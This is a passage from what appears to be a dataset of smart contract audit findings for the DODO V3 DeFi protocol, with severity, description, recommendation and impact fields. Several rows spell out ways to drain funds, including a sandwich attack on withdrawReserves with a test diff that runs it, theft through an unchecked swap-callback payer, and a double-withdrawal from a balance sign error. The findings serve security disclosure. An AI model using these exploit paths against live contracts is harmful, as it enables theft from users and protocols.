quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n\\nIn Lines 157, 159, and 161 above, a malicious user could make the numerator smaller than the denominator (LibQuote.quoteOpenAmount(quote)), and the result will be zero due to a rounding error in Solidity.\\nIn this case, the `quote.lockedValues` will not decrease and will remain the same. As a result, the locked balance of the account will remain the same even though a certain amount of the position has been closed. This could cause the account's locked balance to be higher than expected, and the errors will accumulate if it happens many times.","When the `((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote)))` rounds down to zero, this means that a rounding error has occurred as the numerator is smaller than the denominator. 
The CVA, `filledAmount` or both might be too small.\\nConsider performing input validation against the `filledAmount` within the `fillCloseRequest` function to ensure that the provided values are sufficiently large and will not result in a rounding error.","When an account's locked balances are higher than expected, their available balance will be lower than expected. The available balance affects the amount that users can withdraw from their accounts. The ""silent"" increase in their locked values means that the amount that users can withdraw becomes lesser over time, and these amounts are lost due to the errors.","```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n" 
+Consecutive symbol price updates can be exploited to drain protocol funds,medium,"Repeatedly updating the symbol prices for the symbols used in Party A's positions mid-way through a liquidation while maintaining the same Party A's UPnL and total unrealized losses leads to more profits for Party B and effectively steals funds from the protocol.\\nThe `setSymbolsPrice` function in the `LiquidationFacetImpl` library is used to set the prices of symbols for Party A's positions. It is called by the liquidator, who supplies the `PriceSig memory priceSig` argument, which contains, among other values, the prices of the symbols as well as the `upnl` and `totalUnrealizedLoss` of Party A's positions.\\nParty A's `upnl` and `totalUnrealizedLoss` values are stored in Party A's liquidation details and enforced to remain the same for consecutive calls to `setSymbolsPrice` via the `require` statement in lines 90-95.\\nHowever, as long as those two values remain the same, the liquidator can set the prices of the symbols to the current market prices (fetched by the Muon app). If a liquidator liquidates Party A's open positions in multiple calls to `liquidatePositionsPartyA` and updates symbol prices in between, Party B potentially receives more profits than they should have.\\nThe git diff below contains a test case to demonstrate the following scenario:\\nGiven the following symbols:\\n`BTCUSDT`\\n`AAVEUSDT`\\nFor simplicity, we assume trading fees are 0.\\nParty A's allocated balance: `100e18 USDT`\\nParty A has two open positions with Party B:\\nID Symbol Order Type Position Type Quantity Price Total Value CVA LF MM Total Locked Leverage\\n1 BTCUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\n2 AAVEUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\nParty A's available balance: 100e18 - 100e18 = 0 USDT\\nNow, the price of `BTCUSDT` drops by 40% to `0.6e18 USDT`. 
Party A's `upnl` and `totalUnrealizedLoss` are now `-40e18 USDT` and `-40e18 USDT`, respectively.\\nParty A is insolvent and gets liquidated.\\nThe liquidator calls `setSymbolsPrice` for both symbols, setting the price of `BTCUSDT` to `0.6e18 USDT` and the price of `AAVEUSDT` to `1e18 USDT`. The `liquidationDetails` of Party A are as follows:\\nliquidationType: `LiquidationType.NORMAL`\\nupnl: `-40e18 USDT`\\ntotalUnrealizedLoss: `-40e18 USDT`\\ndeficit: 0\\nliquidationFee: `50e18 - 40e18 = 10e18 USDT`\\nThe liquidator first liquidates position 1 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nNow, due to a volatile market, the price of `AAVEUSDT` drops by 40% to `0.6e18 USDT`. The liquidator calls `setSymbolsPrice` again, setting the price of `AAVEUSDT` to `0.6e18 USDT`. `upnl` and `totalUnrealizedLoss` remain the same. Thus the symbol prices can be updated.\\nThe liquidator liquidates position 2 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nParty B received in total `65e18 + 65e18 = 130e18 USDT`, which is `30e18` USDT more than Party A's initially locked balances. 
Those funds are effectively stolen from the protocol and bad debt.\\nConversely, if both positions had been liquidated in the first call without updating the symbol prices in between, Party B would have received `40e18 + 25e18 = 65e18 USDT`, which Party A's locked balances covered.\\n\\nHow to run this test case:\\nSave git diff to a file named `exploit-liquidation.patch` and run with\\n```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\n","Consider preventing the liquidator from updating symbol prices mid-way of a liquidation process.\\nOr, alternatively, store the number of Party A's open positions in the `liquidationDetails` and only allow updating the symbol prices if the current number of open positions is still the same, effectively preventing the liquidator from updating the symbol prices once a position has been liquidated.","A malicious liquidator can cooperate with Party B and by exploiting this issue during a volatile market, can cause Party B to receive more funds (profits, due to being the counterparty to Party A which faces losses) than it should and steal funds from the protocol.",```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\n +User can perform sandwich attack on withdrawReserves for profit,high,"A malicious user could listen to the mempool for calls to `withdrawReserves`, at which point they can perform a sandwich attack by calling `userDeposit` before the withdraw reserves transaction and then `userWithdraw` after the withdraw reserves transaction. They can accomplish this using a tool like flashbots and make an instantaneous profit due to changes in exchange rates.\\nWhen a user deposits or withdraws from the vault, the exchange rate of the token is calculated between the token itself and its dToken. 
As specified in an inline comment, the exchange rate is calculated like so:\\n```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n\\nwhere `reserves = info.totalReserves - info.withdrawnReserves`. When the owner of the vault calls `withdrawReserves` the withdrawnReserves value increases, so the numerator of the above formula increases, and thus the exchange rate increases. An increase in exchange rate means that the same number of dTokens is now worth more of the underlying ERC20.\\nBelow is a diff to the existing test suite that demonstrates the sandwich attack in action:\\n```\\ndiff --git a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\nindex a699162..337d1f5 100644\\n--- a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n@@ -233,6 // Add the line below\\n233,47 @@ contract D3VaultTest is TestContext {\\n assertEq(d3Vault.getTotalDebtValue(address(d3MM)), 1300 ether);\\n }\\n \\n// Add the line below\\n function testWithdrawReservesSandwichAttack() public {\\n// Add the line below\\n // Get dToken\\n// Add the line below\\n (address dToken2,,,,,,,,,,) = d3Vault.getAssetInfo(address(token2));\\n// Add the line below\\n \\n// Add the line below\\n // Approve tokens\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n D3Token(dToken2).approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n\\n// Add the line below\\n // Set user quotas and mint tokens\\n// Add the line below\\n mockUserQuota.setUserQuota(user1, address(token2), 1000 ether);\\n// Add the line below\\n 
mockUserQuota.setUserQuota(user2, address(token2), 1000 ether);\\n// Add the line below\\n token2.mint(user1, 1000 ether);\\n// Add the line below\\n token2.mint(user2, 1000 ether);\\n// Add the line below\\n\\n// Add the line below\\n // User 1 deposits to allow pool to borrow\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n d3Proxy.userDeposit(user1, address(token2), 500 ether);\\n// Add the line below\\n token2.mint(address(d3MM), 100 ether);\\n// Add the line below\\n poolBorrow(address(d3MM), address(token2), 100 ether);\\n// Add the line below\\n\\n// Add the line below\\n vm.warp(365 days // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n // Accrue interest from pool borrow\\n// Add the line below\\n d3Vault.accrueInterest(address(token2));\\n// Add the line below\\n uint256 reserves = d3Vault.getReservesInVault(address(token2));\\n// Add the line below\\n\\n// Add the line below\\n // User 2 performs a sandwich attack on the withdrawReserves call to make a profit\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userDeposit(user2, address(token2), 100 ether);\\n// Add the line below\\n vm.prank(vaultOwner);\\n// Add the line below\\n d3Vault.withdrawReserves(address(token2), reserves);\\n// Add the line below\\n uint256 dTokenBalance = D3Token(dToken2).balanceOf(user2);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userWithdraw(user2, address(token2), dToken2, dTokenBalance);\\n// Add the line below\\n assertGt(token2.balanceOf(user2), 1000 ether);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testWithdrawReserves() public {\\n vm.prank(user1);\\n token2.approve(address(dodoApprove), type(uint256).max);\\n```\\n","There are a couple of ways this type of attack could be prevented:\\nUser deposits could have a minimum lock time in the protocol to prevent an immediate withdraw. 
However the downside is the user will still profit in the same manner due to the fluctuation in exchange rates.\\nIncreasing reserves whilst accruing interest could have an equal and opposite decrease in token balance accounting. Every time reserves increase you are effectively taking token value out of the vault and ""reserving"" it for the protocol. Given the borrow rate is higher than the reserve increase rate, the exchange rate will continue to increase. I think something like the following would work (please note I haven't tested this):\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\nindex 2fb9364..9ad1702 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n@@ // Remove the line below\\n157,6 // Add the line below\\n157,7 @@ contract D3VaultFunding is D3VaultStorage {\\n uint256 compoundInterestRate = getCompoundInterestRate(borrowRatePerSecond, deltaTime);\\n totalBorrowsNew = borrowsPrior.mul(compoundInterestRate);\\n totalReservesNew = reservesPrior // Add the line below\\n (totalBorrowsNew // Remove the line below\\n borrowsPrior).mul(info.reserveFactor);\\n// Add the line below\\n info.balance = info.balance // Remove the line below\\n (totalReservesNew // Remove the line below\\n reservesPrior);\\n borrowIndexNew = borrowIndexPrior.mul(compoundInterestRate);\\n \\n accrualTime = currentTime;\\n@@ // Remove the line below\\n232,7 // Add the line below\\n233,7 @@ contract 
D3VaultFunding is D3VaultStorage {\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n// Remove the line below\\n return (cash // Add the line below\\n info.totalBorrows // Remove the line below\\n (info.totalReserves // Remove the line below\\n info.withdrawnReserves)).div(dTokenSupply);\\n// Add the line below\\n return (cash // Add the line below\\n info.totalBorrows).div(dTokenSupply);\\n } \\n \\n /// @notice Make sure accrueInterests or accrueInterest(token) is called before\\n```\\n",An attacker can perform a sandwich attack on calls to `withdrawReserves` to make an instantaneous profit from the protocol. This effectively steals funds away from other legitimate users of the protocol.,```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n +Calls to liquidate don't write down totalBorrows which breaks exchange rate,high,"When a pool is liquidated, the `totalBorrows` storage slot for the token in question should be decremented by `debtToCover` in order to keep the exchange rate of the corresponding `pToken` correct.\\nWhen users call `liquidate` to `liquidate` a pool, they specify the amount of debt they want to cover. In the end this is used to write down the borrow amount of the pool in question:\\n```\\nrecord.amount = borrows - debtToCover;\\n```\\n\\nHowever, the `totalBorrows` of the token isn't written down as well (like it should be). The `finishLiquidation` method correctly writes down the `totalBorrows` state.",The `liquidate` method should include the following line to write down the total borrow amount of the debt token being liquidated:\\n```\\ninfo.totalBorrows = info.totalBorrows - debtToCover;\\n```\\n,"When a user calls `liquidate` to `liquidate` a pool, the exchange rate of the token (from its pToken) remains high (because the `totalBorrows` for the token isn't decremented). 
The result is that users that have deposited this ERC20 token are receiving a higher rate of interest than they should. Because this interest is not being covered by anyone the end result is that the last withdrawer from the vault will not be able to redeem their pTokens because there isn't enough of the underlying ERC20 token available. The longer the period over which interest accrues, the greater the incentive for LPs to withdraw early.",```\\nrecord.amount = borrows - debtToCover;\\n```\\n +"Anyone can sell other users' tokens as `fromToken`, and get the `toToken`'s themselves due to `decodeData.payer` is never checked.",high,"Anyone can sell other users' tokens as `fromToken`, and get the toToken's themselves due to `decodeData.payer` is never checked.\\nLet's examine the token-selling process and the transaction flow.\\nThe user will initiate the transaction with the `sellTokens()` method in the `D3Proxy.sol` contract, and provide multiple inputs like `pool`, `fromToken`, `toToken`, `fromAmount`, `data` etc.\\n```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, ""D3PROXY_VALUE_INVALID"");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n\\nAfter some checks, this method in the `D3Proxy.sol` will make a call to the `sellToken()` 
function in the pool contract (inherits D3Trading.sol). After this call, things that will happen in the pool contract are:\\nTransferring the toToken's to the ""to"" address (with _transferOut)\\nMaking a callback to `D3Proxy` contract to deposit fromToken's to the pool. (with IDODOSwapCallback(msg.sender).d3MMSwapCallBack)\\nChecking the pool balance and making sure that the fromToken's are actually deposited to the pool. (with this line: IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount)\\n```\\n// File: D3Trading.sol\\n// Method: sellToken()\\n108.--> _transferOut(to, toToken, receiveToAmount);\\n109.\\n110. // external call & swap callback\\n111.--> IDODOSwapCallback(msg.sender).d3MMSwapCallBack(fromToken, fromAmount, data);\\n112. // transfer mtFee to maintainer\\n113. _transferOut(state._MAINTAINER_, toToken, mtFee);\\n114.\\n115. require(\\n116.--> IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount,\\n117. Errors.FROMAMOUNT_NOT_ENOUGH\\n118. );\\n```\\n\\nThe source of the vulnerability is the `d3MMSwapCallBack()` function in the `D3Proxy`. 
It is called by the pool contract with the `fromToken`, `fromAmount` and `data` inputs to make a `fromToken` deposit to the pool.\\n```\\n//File: D3Proxy.sol \\n /// @notice This callback is used to deposit token into D3MM\\n /// @param token The address of token\\n /// @param value The amount of token need to deposit to D3MM\\n /// @param _data Any data to be passed through to the callback\\n function d3MMSwapCallBack(address token, uint256 value, bytes calldata _data) external override {\\n require(ID3Vault(_D3_VAULT_).allPoolAddrMap(msg.sender), ""D3PROXY_CALLBACK_INVALID"");\\n SwapCallbackData memory decodeData;\\n decodeData = abi.decode(_data, (SwapCallbackData));\\n--> _deposit(decodeData.payer, msg.sender, token, value);\\n }\\n```\\n\\nAn attacker can create a `SwapCallbackData` struct with any regular user's address, encode it and pass it through the `sellTokens()` function, and get the toToken's.\\nYou can say that `_deposit()` will need the payer's approval but the attackers will know that too. A regular user might have already approved the pool & proxy for the max amount. Attackers can easily check any token's allowances and exploit already approved tokens. Or they can simply watch the mempool and front-run any normal seller right after they approve but before they call the `sellTokens()`.","I would recommend to check if the `decodeData.payer == msg.sender` in the beginning of the `sellTokens()` function in `D3Proxy` contract. Because msg.sender will be the pool's address if you want to check it in the `d3MMSwapCallBack()` function, and this check will not be valid to see if the payer is actually the seller.\\nAnother option might be creating a local variable called ""seller"" and saving the msg.sender value when they first started the transaction. 
After that make `decodeData.payer == seller` check in the `d3MMSwapCallBack()`.",An attacker can sell any user's tokens and steal their funds.,"```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, ""D3PROXY_VALUE_INVALID"");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n" +"When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vault",high,"When a D3MM pool repays all of the borrowed funds to vault using D3Funding.sol repayAll, an attacker can steal double the amount of those funds from vault. 
This is because the balance of vault is not updated correctly in D3VaultFunding.sol _poolRepayAll.\\n`amount` should be added in `info.balance` instead of being subtracted.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n\\nA `D3MM pool` can repay all of the borrowed funds from vault using the function D3Funding.sol repayAll which further calls D3VaultFunding.sol poolRepayAll and eventually D3VaultFunding.sol _poolRepayAll.\\n```\\n function repayAll(address token) external onlyOwner nonReentrant poolOngoing {\\n ID3Vault(state._D3_VAULT_).poolRepayAll(token);\\n _updateReserve(token);\\n require(checkSafe(), Errors.NOT_SAFE);\\n }\\n```\\n\\nThe vault keeps a record of borrowed funds and its current token balance.\\n`_poolRepayAll()` is supposed to:\\nDecrease the borrowed funds by the repaid amount\\nIncrease the token balance by the same amount #vulnerability\\nTransfer the borrowed funds from pool to vault\\nHowever, `_poolRepayAll()` is decreasing the token balance instead.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n .\\n .\\n\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n\\n IERC20(token).safeTransferFrom(pool, address(this), amount);\\n\\n emit PoolRepay(pool, token, amount, interests);\\n }\\n```\\n\\nLet's say a vault has 100,000 USDC A pool borrows 20,000 USDC from vault\\nWhen the pool calls `poolRepayAll()`, the asset info in vault will change as follows:\\n`totalBorrows => 20,000 - 20,000 => 0` // info.totalBorrows - amount\\n`balance => 100,000 - 20,000 => 80,000` // info.balance - amount\\n`tokens owned by vault => 100,000 + 20,000 => 120,000 USDC` // 20,000 USDC is transferred from pool to vault (repayment)\\nThe difference of recorded balance (80,000) 
and actual balance (120,000) is `40,000 USDC`\\nAn attacker waits for the `poolRepayAll()` function call by a pool.\\nWhen `poolRepayAll()` is executed, the attacker calls D3VaultFunding.sol userDeposit(), which deposits 40,000 USDC in vault on behalf of the attacker.\\nAfter this, the attacker withdraws the deposited amount using D3VaultFunding.sol userWithdraw() and thus gains 40,000 USDC.\\n```\\n function userDeposit(address user, address token) external nonReentrant allowedToken(token) {\\n .\\n .\\n .\\n AssetInfo storage info = assetInfo[token];\\n uint256 realBalance = IERC20(token).balanceOf(address(this)); // check tokens owned by vault\\n uint256 amount = realBalance - info.balance; // amount = 120000-80000\\n .\\n .\\n .\\n IDToken(info.dToken).mint(user, dTokenAmount);\\n info.balance = realBalance;\\n\\n emit UserDeposit(user, token, amount);\\n }\\n```\\n","Issue When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vault\\nIn D3VaultFunding.sol _poolRepayAll, do the following changes:\\nCurrent code: `info.balance = info.balance - amount;`\\nNew (replace '-' with '+'): `info.balance = info.balance + amount;`",Loss of funds from vault. The loss will be equal to 2x amount of borrowed tokens that a D3MM pool repays using D3VaultFunding.sol poolRepayAll,"```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n" +possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplication,medium,finishLiquidation() divides before multiplying when calculating realDebt.\\n```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 
1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n\\nThere will be precision loss when calculating the realDebt because solidity truncates values when dividing and dividing before multiplying causes precision loss.\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\n,don't divide before multiplying,Issue possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplication\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\n,```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n
+`D3VaultFunding.userWithdraw()` does not have mindTokenAmount,medium,"`D3VaultFunding.userWithdraw()` does not have mindTokenAmount, and uses `_getExchangeRate` directly. This is vulnerable to a sandwich attack.\\nAs we can see, `D3VaultFunding.userWithdraw()` does not have mindTokenAmount, and uses `_getExchangeRate` directly.\\n```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need ""user"" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill ""user"" param with wrong addresses,\\n // we use ""msg.sender"" 
param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n\\nAnd the `_getExchangeRate()` result is about `cash` , `info.totalBorrows`, info.totalReserves,info.withdrawnReserves,dTokenSupply,This is vulnerable to a sandwich attack leading to huge slippage\\n```\\nfunction _getExchangeRate(address token) internal view returns (uint256) {\\n AssetInfo storage info = assetInfo[token];\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n return (cash + info.totalBorrows - (info.totalReserves - info.withdrawnReserves)).div(dTokenSupply);\\n } \\n```\\n",Add `mindTokenAmount` parameter for `userWithdraw()` function and check if `amount < mindTokenAmount`,This is vulnerable to a sandwich attack.,"```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need ""user"" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill ""user"" param with wrong addresses,\\n // we use ""msg.sender"" param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n" +D3Oracle will return the wrong price if the Chainlink aggregator returns price outside min/max range,medium,"Chainlink oracles have a min and max price that they return. 
If the price goes below the minimum price the oracle will not return the correct price but only the min price. Same goes for the other extremity.\\nBoth `getPrice()` and `getOriginalPrice()` only check `price > 0` not are they within the correct range\\n```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, ""Chainlink: Incorrect Price"");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, ""Chainlink: Stale Price"");\\nrequire(answeredInRound >= roundID, ""Chainlink: Stale Price"");\\n```\\n","Check the latest answer against reasonable limits and/or revert in case you get a bad price\\n```\\n require(price >= minAnswer && price <= maxAnswer, ""invalid price"");\\n```\\n","The wrong price may be returned in the event of a market crash. The functions with the issue are used in `D3VaultFunding.sol`, `D3VaultLiquidation.sol` and `D3UserQuota.sol`","```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, ""Chainlink: Incorrect Price"");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, ""Chainlink: Stale Price"");\\nrequire(answeredInRound >= roundID, ""Chainlink: Stale Price"");\\n```\\n" +parseAllPrice not support the tokens whose decimal is greater than 18,medium,"`parseAllPrice` not support the token decimal is greater than 18, such as NEAR with 24 decimal. 
Since `buyToken / sellToken` is dependent on `parseAllPrice`, users can't trade tokens larger than 18 decimal, but DODOv3 is intended to be compatible with all standard ERC20, which is not expected.\\n```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n\\nIf `tokenDecimal > 18`, `18 - tokenDecimal` will revert",Fix decimal to 36 instead of 18,"DODOv3 is not compatible with the tokens whose decimal is greater than 18, users can't trade them.",```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n
+Wrong assignment of `cumulativeBid` for RangeOrder state in getRangeOrderState function,medium,"Wrong assignment of `cumulativeBid` for RangeOrder state\\nIn `D3Trading`, the `getRangeOrderState` function is returning RangeOrder (get swap status for internal swap) which is assigning the wrong toTokenMMInfo.cumulativeBid, which is supposed to be `cumulativeBid` not `cumulativeAsk`\\nThe error lies in the assignment of `roState.toTokenMMInfo.cumulativeBid`. Instead of assigning `tokenCumMap[toToken].cumulativeAsk`, it should be assigning `tokenCumMap[toToken].cumulativeBid`.\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 
